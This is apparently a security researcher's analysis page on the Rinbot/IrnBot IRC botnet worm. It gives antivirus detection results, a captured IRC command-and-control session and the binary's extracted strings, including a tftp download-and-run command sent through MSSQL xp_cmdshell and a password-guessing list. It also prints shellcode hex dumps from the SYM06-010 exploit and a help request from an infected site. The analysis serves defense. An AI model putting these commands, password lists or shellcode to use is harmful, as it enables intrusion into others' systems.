Skip navigation.
Home

Rinbot / Delbot

A generous user provided us with the rinbot / delbot sample. However our scans show it as vanbot.

b09d49c377de3e835eb5bdfc31be5a66

AntiVir 7.3.1.38 03.02.2007 BDS/VanBot.AY.10
Authentium 4.93.8 03.04.2007 W32/Backdoor.AGKF
Avast 4.7.936.0 03.03.2007 no virus found
AVG 7.5.0.447 03.03.2007 Win32/CryptExe
BitDefender 7.2 03.04.2007 Backdoor.VanBot.L
CAT-QuickHeal 9.00 03.02.2007 Backdoor.VanBot.ay
ClamAV devel-20060426 03.03.2007 no virus found
DrWeb 4.33 03.03.2007 BackDoor.IRC.Sdbot.1129
eSafe 7.0.14.0 02.28.2007 Win32.VanBot.ay
eTrust-Vet 30.6.3449 03.03.2007 Win32/Nirbot.N
Ewido 4.0 03.03.2007 Backdoor.VanBot.ay
FileAdvisor 1 03.04.2007 no virus found
Fortinet 2.85.0.0 03.04.2007 W32/SDBot.H!worm
F-Prot 4.3.1.45 03.04.2007 W32/Backdoor.AGKF
F-Secure 6.70.13030.0 03.03.2007 Backdoor.Win32.VanBot.ay
Ikarus T3.1.1.3 03.04.2007 Backdoor.Win32.VanBot.ay
Kaspersky 4.0.2.24 03.04.2007 Backdoor.Win32.VanBot.ay
McAfee 4975 03.02.2007 W32/Sdbot.worm.gen.h
Microsoft 1.2204 03.04.2007 no virus found
NOD32v2 2093 03.03.2007 Win32/Rinbot.D
Norman 5.80.02 03.02.2007 no virus found
Panda 9.0.0.4 03.03.2007 W32/IrnBot.F.worm
Prevx1 V2 03.04.2007 Malware.Trojan.Backdoor.Gen
Sophos 4.14.0 03.03.2007 W32/Sdbot-CZW
Sunbelt 2.2.907.0 03.01.2007 Backdoor.Win32.VanBot.ay
Symantec 10 03.04.2007 W32.Rinbot.H
TheHacker 6.1.6.067 03.01.2007 Backdoor/VanBot.ay
UNA 1.83 03.02.2007 Backdoor.VanBot.19F1
VBA32 3.11.2 03.03.2007 Backdoor.Win32.VanBot.ay
VirusBuster 4.3.19:9 03.03.2007 Worm.Irnbot.B

A couple of interesting things:

00000458 00400458 0
00000CA3 00400CA3 0 DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
0003A058 0043A058 0

Ill unpack it / analyze it tomorrow.

V.

Ok here is the botnet traffic

NICK [XP|USA|P|00|wxgZxWzE]
USER XP-USA 0 0 :[XP|USA|P|00|wxgZxWzE]
:s004.xnet.net NOTICE AUTH :*** Looking up your hostname...
:s004.xnet.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:s004.xnet.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:s004.xnet.net NOTICE [XP|USA|P|00|wxgZxWzE] :*** If you are having problems connecting due to ping timeouts, please type /quote pong C40DC39B or /raw pong C40DC39B now.
PING :C40DC39B
PONG :C40DC39B
:s004.xnet.net 001 [XP|USA|P|00|wxgZxWzE] :Welcome to the xnet IRC Network [XP|USA|P|00|wxgZxWzE]!XP-USA@
:s004.xnet.net 002 [XP|USA|P|00|wxgZxWzE] :Your host is s004.xnet.net, running version Unreal3.2.5
:s004.xnet.net 003 [XP|USA|P|00|wxgZxWzE] :This server was created Sat Feb 25 19:37:48 2006
:s004.xnet.net 004 [XP|USA|P|00|wxgZxWzE] s004.xnet.net Unreal3.2.5 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:s004.xnet.net 005 [XP|USA|P|00|wxgZxWzE] NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
:s004.xnet.net 005 [XP|USA|P|00|wxgZxWzE] WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=xnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:s004.xnet.net 005 [XP|USA|P|00|wxgZxWzE] CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
MODE [XP|USA|P|00|wxgZxWzE] -x
JOIN ##CNN THISISCNN
:s004.xnet.net 422 [XP|USA|P|00|wxgZxWzE] :MOTD File is missing
:[XP|USA|P|00|wxgZxWzE] MODE [XP|USA|P|00|wxgZxWzE] :+iwx
:[XP|USA|P|00|wxgZxWzE] MODE [XP|USA|P|00|wxgZxWzE] :-x
:[XP|USA|P|00|wxgZxWzE]!XP-USA@ JOIN :##CNN
:s004.xnet.net 332 [XP|USA|P|00|wxgZxWzE] ##CNN :.scan.stop -s;.scan.start N 30 -s;.scan.start N 30 -a -s;.scan.start N x.x.x.x 30 -s;.scan.start M 15 -a -s;.scan.start M 15 -s;.scan.start M x.x.x.x 15 -s;.scan.start S 15 -a -s;.scan.start S 15 -s;.scan.start S x.x.x.x 15 -s
:s004.xnet.net 333 [XP|USA|P|00|wxgZxWzE] ##CNN ncjml 1172975826
:s004.xnet.net 353 [XP|USA|P|00|wxgZxWzE] @ ##CNN :[XP|USA|P|00|wxgZxWzE] @a @b
:s004.xnet.net 366 [XP|USA|P|00|wxgZxWzE] ##CNN :End of /NAMES list.
PING :s004.xnet.net
PONG :s004.xnet.net
:a`!a@AC9CB846.49DBB37.80282C88.IP MODE ##CNN +o a`
:a!a@AC9CB846.49DBB37.80282C88.IP QUIT :[irc.xnet.net] Local kill by a` (die)
PING :s004.xnet.net
PONG :s004.xnet.net
:b!you@state.of.z3n QUIT :Operation would block
:a`!a@AC9CB846.49DBB37.80282C88.IP QUIT :Client exited
:a!a@AC9CB846.49DBB37.80282C88.IP MODE ##CNN +o a
:b!you@xnet.x MODE ##CNN +o b

rinbot strings

Some data:
OCID 2222587770 | F-Prot:W32/Spybot.MGZ | BitDefender: Generic.Sdbot.4F162F4F | Kaspersky: Backdoor.Win32.Rbot.gen| ClamAV: /malware.exe | AntiVir: | Avast: Win32:Spybot-A2173 [Trj]| Avg: Trojan horse IRC/BackDoor.SdBot.190.AD| File Size: 212K md5sum: e47f9d6177ad1afd89e27d427f8a1aca | sha1sum: e037699ed7d0096a9f889cba4e1f0b3ac9319f50 | sha2sum: 58efa854f0ec7a685bfc99bfe25283bd86952e8d354f2c15ce3e0f6c323e2e9c

of particular interest in the strings is:

Tonight on CNN An interview with the authors of Rinbot. Who are you Hackers. Are you actually disgruntled No. Then why are you actively going after Symantec The worm is designed for getting the highest yield of computers infected, not to aggravate Symantec there is no hate. So why attack the Symantec antivirus program A lot of businesses and universities run the application, making it a prime target for exploitation. Are you aware that your worm is crippling computer networks Yes that can happen on slow networks or networks with many computers the worm also searches and removes other worms from the system, acting as a small antivirus program if you will. If you wish not to have those problems keep your software updated. Why did you taunt Symantec and other security companies They were the first to list the worm on their site and try and get servers shut down. What do you intent to use the infected computers for Nothing very malicious no fraud or anything like that. What is the real name of the worm and how did you come up with it The real name is IrnBot, it is named after a popular soft drink called IrnBru. Thank you for your time author of Rinbot. You are very welcome CNN, thank you for the opportunity to explain.

The above is in one of the spawned processes.

tftp i s GET irn.exestart irn.exeexit
This tells me it has tftp capabilities to go grab a file

EXEC master..xp_cmdshell tftp i s GET irn.exestart irn.exeexit
This tells me it targets mssql stored proceedures to run tftp

HTTP Transfer d.d.d.d N/A. d Total Sends.
This tells me it has http call back capabilities

Dear Symantec For years I have longed for just one thing, to make malware with just the right sting, you detected my creation and got my domains killed, but I will not stop, I can rebuild. P.S. Fuck you assholes.
This tells me the author has a sense of humor / grudge.

sqlpassoainstall
databasepassword
domainpassword
Theres what looks to be a whole bunch of usernames and passwords to maybe it tries to crack them.

s Exploited s.
admin
root
s Exploited s.
\\s\pipe\browser
\\s\ipc
Similar to above, maybe it does smb account cracking

scan.stats
scan.stop
scan.start
Some kind of scanner ?

.AVmdlScanner
.AVmdlScanStop

Scans for antivirus?

STRINGS:
####################3
This program cannot be run in DOS mode.
assembly xmlns
urnschemasmicrosoftcomasm.v1 manifestVersion
uVu uPu
fofoNfoV fo0f
bad allocation
string too long
invalid string position
Unknown exception
runtime error
TLOSS error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.Please contact the applications support team for more information.
This application has requested the Runtime to terminate it in an unusual way.Please contact the applications support team for more information.
Microsoft Visual C
program name unknown
Runtime Error
bad exception
local static thread guard
managed vector copy constructor iterator
vector vbase copy constructor iterator
vector copy constructor iterator
dynamic atexit destructor for
dynamic initializer for
eh vector vbase copy constructor iterator
eh vector copy constructor iterator
managed vector destructor iterator
managed vector constructor iterator
placement delete
placement delete closure
omni callsig
local vftable constructor closure
local vftable
udt returning
copy constructor closure
eh vector vbase constructor iterator
eh vector destructor iterator
eh vector constructor iterator
virtual displacement map
vector vbase constructor iterator
vector destructor iterator
vector constructor iterator
scalar deleting destructor
default constructor closure
vector deleting destructor
vbase destructor
local static guard
bad allocation
bad allocation
tftp i s GET irn.exestart irn.exeexit
bad allocation
bad allocation
Windows NT4, 200 SP0SP4
Windows XP SP0SP1
bad allocation
EXEC master..xp_cmdshell tftp i s GET irn.exestart irn.exeexit
bad allocation
UDP Error Sending UDP Packets to s
UDP Sending UDP Packets to s
UDP Finished Sending UDP Packets to s
bad allocation
bad allocation
S4 socket
S4 bind
S4 listen
bad allocation
SOFTWARE\MICROSOFT\Windows NT\CurrentVersion
bad allocation
bad allocation
DL Downloading s to s
DL Failed Bad Location.
DL Download s
Main Uninstalling Drone
DL Failed To Update
DL Error Executing File.
DL Executed File s
DL Failed Bad URL
DL Failed WinINET Error
bad allocation
bad allocation
TFTP Server
TFTP Send Complete To s. d Total Sends
bad allocation
bad allocation
bad allocation
bad allocation
bad allocation
bad allocation
HTTP/1.1 501 Not Implemented
Connection close
HTTP/1.1 200 ok
Connection close
HTTP Transfer d.d.d.d N/A. d Total Sends.
HTTP Transfer d.d.d.d
s. d Total Sends.
bad allocation
bad allocation
echo off
if exist
Registry Monitor
Remove Authentication Failed.
OS Microsoft Windows s s
i.i build i
bad allocation
bad allocation
bad allocation
bad allocation
bad allocation
Bot Killed s
bad allocation
listT too long
DL Auth Failure.
DL Invalid Arguments
UPD Auth Failure.
UPD Invalid Arguments.8B
QUIT Irn Powered
System Uptime I64u Days, I64u Hours, I64u Minutes.
Windows CD Key s
S4Already Running
S4 Thread Stopped
S4 No Thread Running
System s CPU i x s dMhz RAM iMB/iMB Country s IP s User s System Dir s Uptime I64ud I64uh I64um
Net IP s Host N/A
Net IP s Host s
UDP Insufficient Arguments.
Scan Unknown Exploit.
Scan Not Enough Threads. d Available.
Scan All Scan Threads Stopped. d killed.
Statistics Exploits
Dear Symantec For years I have longed for just one thing, to make malware with just the right sting, you detected my creation and got my domains killed, but I will not stop, I can rebuild. P.S. Fuck you assholes.
assembly xmlns
urnschemasmicrosoftcomasm.v1 manifestVersion
,Gj jY\a5YY
Val sz
----------------
EVirtEualQEuery3
MessageBoxA
VirtualFree
VirtualAlloc
ExitProcess
GetProcAddress
LoadLibraryA
GetModuleHandleA
kernel32.dll
MessageBoxA
VirtualFree
VirtualAlloc
ExitProcess
GetProcAddress
LoadLibraryA
GetModuleHandleA
kernel32.dll
C\WINDOWS\System32\mstscc.exe
mstscc.exe
C\WINDOWS\System32\mstscc.exe
C\WINDOWS\System32
C\WINDOWS\System32\mstscc.exe
.AVmdlScanner
.AVmdlScanStop
.AVmdlScanStats
.AVmdlSysInfo
.AVmdlNetInfo
.AVmdlS4Stop
.AVmdlUptime
.AVmdlHTTPInfo
.AVmdlCDKey
.AVbad_allocstd
.AVexceptionstd
.AVlogic_errorstd
.AVlength_errorstd
.AVclsModule
azXKCDuLPtTtdpHC
urlmon.dllC\U.exe3d
\/aabb
NKeb
.AVbad_exceptionstd
abcdefghijklmnopqrstuvwxyz
abcdefghijklmnopqrstuvwxyz
.AVtype_info
.AVout_of_rangestd
s Daemons
Scanner
d Using d Threads.
Scan s
I Insufficient Arguments.
EventMessageFile
SYSTEM\ControlSet001\Services\Eventlog\System
SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
System
SeDebugPrivilege
SeDebugPrivilege
psapi.dll
GetModuleFileNameExA
kernel32.dll
ReadProcessMemory
kernel32.dll
Thread32Next
kernel32.dll
Thread32First
kernel32.dll
Module32Next
kernel32.dll
Module32First
kernel32.dll
Process32Next
kernel32.dll
Process32First
kernel32.dll
CreateToolhelp32Snapshot
kernel32.dll
OpenProcess
kernel32.dll
OpenThread
services.exe
svchost.exe
winlogon.exe
MessageBoxA
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ccc.bat
s goto 1
ContentLength d
ContentLength d
IrnBot
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM
install
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
t/Cocxr
tocxx
i Bytes finished in i seconds
Mozilla/5.0
update
download
i.part
i.join
i.quit
DigitalProductId
cdkey
uptime
Error
Error
Error
s4.stop
netinfo
sysinfo
HARDWARE\DESCRIPTION\System\CentralProcessor\i
Unknown
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
staff
teacher
student
intranet
internet
main
winpass
blank
office
control
nokia
siemens
compaq
dell
cisco
oracle
orainstall
sqlpassoainstall
databasepassword
data
databasepass
dbpassword
dbpass
access
database
domainpassword
domainpass
domain
hello
hell
slut
bitch
fuck
exchange
backup
technical
loginpass
login
mary
katie
kate
george
eric
chris
neil
brian
peter
susan
luke
peter
john
mike
bill
fred
winnt
winxp
windows
oeminstall
oemuser
user
homeuser
home
accounting
accounts
internet
outlook
mail
qwerty
null
root
server
system
default
changeme
linux
unix
demo
none
guest
test
pass
passwd
password
password1
admin
admins
administrat
administrateur
administrador
administrator
s Exploited s.
admin
root
s Exploited s.
\\s\pipe\browser
\\s\ipc
scan.stats
scan.stop
scan.start
GAIsProcessorFeaturePresent
JanFebMarAprMayJunJulAugSepOctNovDec
SunMonTueWedThuFriSat
sinh
cosh
tanh
fabs
ldexp
_cabs
_hypot
fmod
frexp
_logb
_nextafter
MessageBoxA
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationA
GetProcessWindowStation
__based
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__clrcall
__restrict
__unaligned
new
delete
operator
vftable
vbtable
vcall
typeof
string
new
delete
closure
Type Descriptor
Base Class Descriptor at
Base Class Array
Class Hierarchy Descriptor
Complete Object Locator
kernel32.dll
InitializeCriticalSectionAndSpinCount
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
_abcdefghijklmnopqrstuvwxyz
abcdefghijklmnopqrstuvwxyz\
asin
acos
atan
ceil
floor
modf
Program
Runtime Library
floating point not loaded
not enough space for arguments
not enough space for environment
not enough space for thread data
unexpected multithread lock error
unexpected heap error
unable to open console device
not enough space for _onexit/atexit table
pure virtual function call
not enough space for stdio initialization
not enough space for lowio initialization
unable to initialize heap
CRT not initialized
Attempt to initialize the CRT more than once.This indicates a bug in your application.
not enough space for locale information
Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSILcompiled /clr function from a native constructor or from DllMain.
mscoree.dll
CorExitProcess
null
null
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
DecodePointer
EncodePointer
_abcdefghijklmnopqrstuvwxyz
spa5rpza
5oqjprsw
.data
lqug4kjb
.text

rinbot

Our network had been infiltrated with this. We've been doing the obvious... but all is not well.
We have one server in particular that periodically reboots. It does appear that the 'scan' is being run approxiamately 15 seconds
after symantec anti virus service is loaded. I don't see this in the server logs until
after the initial attack.

Any thoughts?

wed be happy

To come out and help (take a look at our Consulting Services link at the top left :)

However I'm still analyzing this. First thing I would do is block outgoing irc especially to hosts that look like s004.xnet.net on port 8080. Make sure all your passwords are up to date and complex (it cracks SMB accounts looks like).

More later.

V.

Quick Analysis Notes

It's doing lookups for:
x.rofflewaffles.us
x.pennysheet.com
crusade.godhatesfags.com
x.sans-security.org
Tries to connect to IRC servers running on port 7998, and 8080. For 7998, it joins channel "##GHF" with password "weh4t3youall"

Blah blah blah, I'm mostly interested in the SYM06-010 exploit. It's located at 0x004255E0 in the unpacked (running) bot's memory. It's referenced from 0x0041B1BE, where it's the argument to a WS2_32.SEND

In context:
0x0041B19E is a connect() call
0x0041B19B CMP EAX, -1 ; check return from connect()
0x0041B19E JNZ short 0x0041B1B7
[...]
0x0041B1B7 6A 00 ; PUSH 0
0x0041B1B9 68 13120000 ; PUSH 4627.0
0x0041B1BE 68 E0554200 ; The SYM06-010 Exploit String
0x0041B1C3 56 ; PUSH ESI
0x0041B1C4 FF15 28F24100 ; CALL WS2_32.SEND

Strangely, the length of the SYM06-010 exploit only seems to be 0x0B6F bytes long, not 0x1213

Anyway, I need to spend more than five minutes digging into this. The shellcode this bot uses is different than the shellcode used by the recent Big Yellow worm:

IrnBot (VanBot/RinBot/etc.):
0x00426120: 016C6C6C 6C6C6C6C 6C6C6C6C 6C6C6C6C .lllllllllllllll
0x00426130: 6C6C6C6C 6C6C6C6C 6C6C6C6C 6C6C6C6C llllllllllllllll
0x00426140: 6C6C6C6C 6C6C4141 EB060D10 1E506D6D llllllAA
0x00426150: 33C983E9 B0D9EED9 7424F45B 817313C8 3
0x00426160: D97F8783 EBFCE2F4 34B394CA 20208078
0x00426170: 37B9F4EB ECFDF4C2 F4520382 B0D8900C 7
0x00426180: 87C1F4D8 E8D894CE 43EDF486 26E8BF1E .
0x00426190: 645DBFF3 CF18B58A C91B9473 F38D5BAF d]
0x004261A0: BD3CF4D8 ECD894E1 43D5340C 97C57E6C
0x004261B0: CBF5F40E A4FD63E6 0BE8A4E3 439A4F0C
0x004261C0: 88D5F4F7 D474F4C7 C0871709 86D793D7 .
0x004261D0: 370F19D4 AEB14CB5 A0AE0CB5 978D8057 7..
0x004261E0: A012927B F3898051 97509AE1 49347785
0x004261F0: 9DB37D78 18B1A68E 3D742878 1E8A2CD4 .
0x00426200: 9B8A3CD4 8B8A8057 AEB15EEC AE8AF666 ..<
0x00426210: 5DB1DB9D B81E2878 1EB36FD6 9D26AFEF ]
0x00426220: 6C74516E 9F26A9D4 9D26AFEF 2D90F9CE ltQn.&
0x00426230: 9F26A9D7 9C8D2A78 184A1760 B11F06D0 .&
0x00426240: 370F2A78 18BF15E3 AEB11CEA 413C15D7 7.*x.
0x00426250: 91F0B30E 2FB33B0E 2AE8BF74 62273DAA .
0x00426260: 369B5314 45A3472C 637217F5 366A6978 6.S.E
0x00426270: BD9D8051 938E2DD6 99881586 99882AD6
0x00426280: 3709172A 11DCB1D4 370F1578 37EE8057 7..*.
0x00426290: 438E8304 0CBD8051 9A26AFEF 38537BD8 C....
0x004262A0: 9B26A978 18D97F87 6D6D6D6D 6D6D6D6D .&
0x004262B0: 6D6D6D6D 6D6D6D6D 6D6D6D6D 6D6D6D6D mmmmmmmmmmmmmmmm
0x004262C0: 6D6D6D6D 6D6D6D6D 6D6D6D6D 6D6D6D6D mmmmmmmmmmmmmmmm

Big Yellow:
0x00000B40: 016C6C6C 6C6C6C6C 6C6C6C6C 6C6C6C6C .lllllllllllllll
0x00000B50: 6C6C6C6C 6C6C6C6C 6C6C6C6C 6C6C6C6C llllllllllllllll
0x00000B60: 6C6C6C6C 6C6C4141 EB060D10 1E506D6D llllllAA
0x00000B70: EB0F5B33 C966B914 02803399 43E2FAEB
0x00000B80: 05E8ECFF FFFF706F 999999C3 FD38A999 .
0x00000B90: 999912D9 9512E985 3412D991 124112EA ...
0x00000BA0: A59A6A12 EFE19A6A 12E7B99A 6212D78D
0x00000BB0: AA74CFCE C812A69A 62126BF3 97C06A3F
0x00000BC0: ED91C0C6 1A5E9DDC 7B70C0C6 C7125412
0x00000BD0: DFBD9A5A 48789A58 AA50FF12 9112DF85
0x00000BE0: 9A5A5878 9B9A5812 999A5A12 63126E1A .ZXx..X...Z.c.n.
0x00000BF0: 5F971249 F39AC071 E9999999 1A5F94CB _..I
0x00000C00: CF66CE65 C31241F3 9BC071C4 9999991A
0x00000C10: 75DD126D F389C010 9D177B62 C9C9C9C9 u
0x00000C20: F398F39B 66CE6112 4110C7A1 10C7A510
0x00000C30: C7D9FF5E DFB59898 14DE89C9 CFAA59C9
0x00000C40: C9C9F398 C9C914CE A55E9BFA F4FD99CB
0x00000C50: C966CE75 5E9E9B99 A9A05EDE 9DA43563
0x00000C60: A2F389CE CA66CE65 C966CE69 AA59351C
0x00000C70: 59EC60C8 CBCFCA66 4BC3C032 7B77AA59 Y
0x00000C80: 5A719C66 6666DEFC EDC9EBF6 FAD8FDFD Zq.fff
0x00000C90: EBFCEAEA 99DAEBFC F8EDFCC9 EBF6FAFC
0x00000CA0: EAEAD899 DCE1F0ED CDF1EBFC F8FD99D5
0x00000CB0: F6F8FDD5 F0FBEBF8 EBE0D899 EEEAABC6
0x00000CC0: AAAB99CE CAD8CAF6 FAF2FCED D899FAF6
0x00000CD0: F7F7FCFA ED996D6D 6D6D6D6D 6D6D6D6D
0x00000CE0: 6D6D6D6D 6D6D6D6D 6D6D6D6D 6D6D6D6D mmmmmmmmmmmmmmmm

... Otherwise the exploits are byte for byte itdentical.

More details later...

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

A CNN Inteview From Inside Rinbot

Tonight on CNN: An interview with the author(s) of Rinbot. Who are you? Hacker(s).
Are you actually disgruntled? No. Then why are you actively going after Symantec?
The worm is designed for getting the highest yield of computers infected, not to
aggravate Symantec; there is no hate. So why attack the Symantec anti-virus program?
A lot of businesses and universities run the application, making it a prime target for
exploitation. Are you aware that your worm is crippling computer networks? Yes that
can happen on slow networks or networks with many computers; the worm also searches
and removes other worms from the system, acting as a small anti-virus program if you
will. If you wish not to have those problems keep your software updated. Why did you
taunt Symantec and other security companies? They were the first to list the worm on
their site and try and get servers shut down. What do you intent to use the infected
computers for? Nothing very malicious; no fraud or anything like that. What is the
real name of the worm and how did you come up with it? The real name is IrnBot, it
is named after a popular soft drink called IrnBru. Thank you for your time author of
Rinbot. You are very welcome CNN, thank you for the opportunity to explain.